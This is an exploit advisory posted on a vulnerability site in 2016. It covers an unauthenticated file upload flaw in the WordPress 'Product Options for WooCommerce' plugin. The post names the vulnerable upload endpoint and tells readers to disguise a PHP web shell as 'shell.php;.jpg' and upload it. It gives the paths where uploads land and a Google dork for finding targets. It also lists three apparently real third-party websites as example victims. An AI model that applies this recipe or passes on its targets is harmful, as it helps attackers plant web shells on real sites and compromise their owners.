Wordpress Product Options for WooCommerce Plugin File Upload

2016.04.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|[+] Exploit Title: Wordpress Product Options for WooCommerce Plugin File Upload |[+] |[+] Exploit Author: M4ni4c |[+] |[+] Team Name: Azerbaijan Cyber Army |[+] |[+] Official Website: http://az-cyber.org/ |[+] |[+] Software Link: http://codecanyon.net/item/product-options-for-woocommerce-wp-plugin/7973927 |[+] |[+] Google Dork: inurl:/woocommerce-product-options/includes/ |[+] |[+] Date: 11.04.2016 |[+] |--------------------------------------------------------------| |[+] Exploit: VICTIM/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] Description: Change your shell's extension "shell.php" to "shell.php;.jpg" and upload your shell |[+] |[+] Your files uploaded to VICTIM/wp-content/uploads/filename |[+] |[+] OR |[+] |[+] VICTIM/wp-content/[year]/[month]/filename |[+] |[+] Examples: |[+] |[+] http://www.detasselingppe.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://medindex.am/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://www.bo3generacion.es/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] Qarabag Bizimdir, Bizim Olacaq |[+] |[+] Thanks: KroNiqs, Niko, Riko, Dado, Sprited |[+] And Thanks My Friends: F3D4I & AlpArslan Beyy |[+] Special Thanks: CXSECURITY.COM Team's Members


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top